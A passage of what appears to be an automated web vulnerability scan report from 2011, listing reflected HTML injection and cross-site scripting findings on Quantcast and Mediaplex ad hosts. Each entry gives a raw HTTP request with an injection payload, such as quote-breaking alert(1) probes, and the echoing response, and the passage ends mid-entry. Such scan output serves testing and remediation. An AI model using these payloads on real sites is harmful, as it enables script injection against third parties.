Date: Mon, 14 Feb 2011 01:15:33 GMT
Connection: close
Content-Length: 7825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" dynamic-css screen-optimized.css598a7"><a>e5dcf033114" />
...[SNIP]...

3.80. http://ak.quantcast.com/dynamic-css/screen-optimized.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /dynamic-css/screen-optimized.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9d1d<a>18beb38da81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dynamic-css/screen-optimized.cssa9d1d<a>18beb38da81?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:34 GMT
Connection: close
Content-Length: 7819


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> dynamic-css screen-optimized.cssa9d1d<a>18beb38da81</em>
...[SNIP]...

3.81. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1640<a>fe40a244aa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsc1640<a>fe40a244aa7/concat.js?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:31 GMT
Connection: close
Content-Length: 7759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> jsc1640<a>fe40a244aa7 concat.js</em>
...[SNIP]...

3.82. http://ak.quantcast.com/js/concat.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efbfc"><a>55ce9d351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /jsefbfc"><a>55ce9d351/concat.js?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:30 GMT
Connection: close
Content-Length: 7759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" jsefbfc"><a>55ce9d351 concat.js" />
...[SNIP]...

3.83. http://ak.quantcast.com/js/concat.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /js/concat.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 813a5"><a>65679342fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/concat.js813a5"><a>65679342fd3?v=2011021301 HTTP/1.1
Host: ak.quantcast.com
Proxy-Connection: keep-alive
Referer: http://www.quantcast.com/top-sites-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1340562691-1296313949532; __utmz=14861494.1296918985.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=27727020.780724242.1297445179.1297458290.1297473023.4; qcVisitor=2|97|1297445121784|21|NOTSET; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:15:35 GMT
Connection: close
Content-Length: 15255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" js concat.js813a5"><a>65679342fd3" />
...[SNIP]...

3.84. http://ak.quantcast.com/wp-content/themes/quantcast/css/not_ie.min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/not_ie.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f76"><a>3fa69ed0a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e5f76"><a>3fa69ed0a65/themes/quantcast/css/not_ie.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:25 GMT
Content-Length: 17569
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" e5f76"><a>3fa69ed0a65 themes quantcast css not_ie.min.css" />
...[SNIP]...

3.85. http://ak.quantcast.com/wp-content/themes/quantcast/css/print.min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/print.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5978"><a>377769c7bcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /a5978"><a>377769c7bcc/themes/quantcast/css/print.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:24 GMT
Content-Length: 17563
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" a5978"><a>377769c7bcc themes quantcast css print.min.css" />
...[SNIP]...

3.86. http://ak.quantcast.com/wp-content/themes/quantcast/css/style.min.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/css/style.min.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ef9"><a>ae77fb278cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /37ef9"><a>ae77fb278cd/themes/quantcast/css/style.min.css HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:34 GMT
Content-Length: 17563
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 37ef9"><a>ae77fb278cd themes quantcast css style.min.css" />
...[SNIP]...

3.87. http://ak.quantcast.com/wp-content/themes/quantcast/js/jquery.jstree.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/js/jquery.jstree.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d549"><a>aa46721e34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /6d549"><a>aa46721e34/themes/quantcast/js/jquery.jstree.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:40 GMT
Content-Length: 18092
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" 6d549"><a>aa46721e34 themes quantcast js jquery.jstree.js" />
...[SNIP]...

3.88. http://ak.quantcast.com/wp-content/themes/quantcast/js/minified.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ak.quantcast.com
Path:   /wp-content/themes/quantcast/js/minified.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8cba"><a>d0995bb00a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /e8cba"><a>d0995bb00a4/themes/quantcast/js/minified.js HTTP/1.1
Host: ak.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27727020.1297458290.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=14861494.2106100296.1296313950.1297539959.1297559505.10; __qca=P0-1340562691-1296313949532; qcVisitor=2|97|1297445121784|21|NOTSET;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Date: Mon, 14 Feb 2011 01:22:32 GMT
Content-Length: 18068
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" e8cba"><a>d0995bb00a4 themes quantcast js minified.js" />
...[SNIP]...

3.89. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3685f'-alert(1)-'4d88b1eaae was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 462
Date: Mon, 14 Feb 2011 01:38:23 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=21704443685f'-alert(1)-'4d88b1eaae">
...[SNIP]...

3.90. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 707c4'%3balert(1)//6d6a9985586 was submitted in the mpvc parameter. This input was echoed as 707c4';alert(1)//6d6a9985586 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f707c4'%3balert(1)//6d6a9985586 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 463
Date: Mon, 14 Feb 2011 01:38:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?707c4';alert(1)//6d6a9985586http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

3.91. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-4 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58cba'%3balert(1)//d36ec453a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 58cba';alert(1)//d36ec453a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-4?mpt=2170444&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/a%3B234423004%3B0-0%3B1%3B20580498%3B4307-300/250%3B40033801/40051588/1%3B%3B%7Eokv%3D%3Bad%3Dbb%3Bsz%3D300x250%3Bpos%3Dinline_bb%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Diframe%3Bfromrss%3Dn%3Brss%3Dn%3Bheavy%3Dy%3Bpage%3Darticle%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f&58cba'%3balert(1)//d36ec453a8=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Content-Type: text/html
Content-Length: 465
Date: Mon, 14 Feb 2011 01:38:27 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/a;234423004;0-0;1;20580498;4307-300/250;40033801/40051588/1;;~okv=;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;~aopt=6/0/ff/0;~sscs=?&58cba';alert(1)//d36ec453a8=1http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-4?mpt=2170444">
...[SNIP]...

3.92. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbeaf'-alert(1)-'9307f7dd42 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/3/0/%2a/u%3B234423007%3B0-0%3B1%3B3619820%3B10408-336/850%3B40033784/40051571/1%3B%3B%7Eokv%3D%3Bad%3Dss%3Bad%3Dbb%3Bad%3Dhp%3Bsz%3D160x600%2C300x250%2C336x850%3Bpos%3Dad6%3Bpoe%3Dyes%3Borbit%3Dy%3Bdel%3Djs%3Bfromrss%3Dn%3Brss%3Dn%3B%7Eaopt%3D6/0/ff/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo2=10105:2060/12109:6166; mojo3=14302:28901/13966:19269/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
Set-Cookie: mojo3=13966:2151/14302:28901/10105:2060/1551:16084/17339:3601/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/11293:3113; expires=Wed, 13-Feb-2013 5:55:16 GMT; path=/; domain=.mediaplex.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 457
Date: Mon, 14 Feb 2011 01:37:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/3/0/*/u;234423007;0-0;1;3619820;10408-336/850;40033784/40051571/1;;~okv=;ad=ss;ad=bb;ad=hp;sz=160x600,300x250,336x850;pos=ad6;poe=yes;orbit=y;del=js;fromrss=n;rss=n;~aopt=6/0/ff/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/13966-88527-2151-6?mpt=2157694bbeaf'-alert(1)-'9307f7dd42">
...[SNIP]...

3.93. http://altfarm.mediaplex.com/ad/js/13966-88527-2151-6 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88527-2151-6

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 712dc'%3balert(1)//23d3264674b was submitted in the mpvc parameter. This input was echoed as 712dc';alert(1)//23d3264674b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

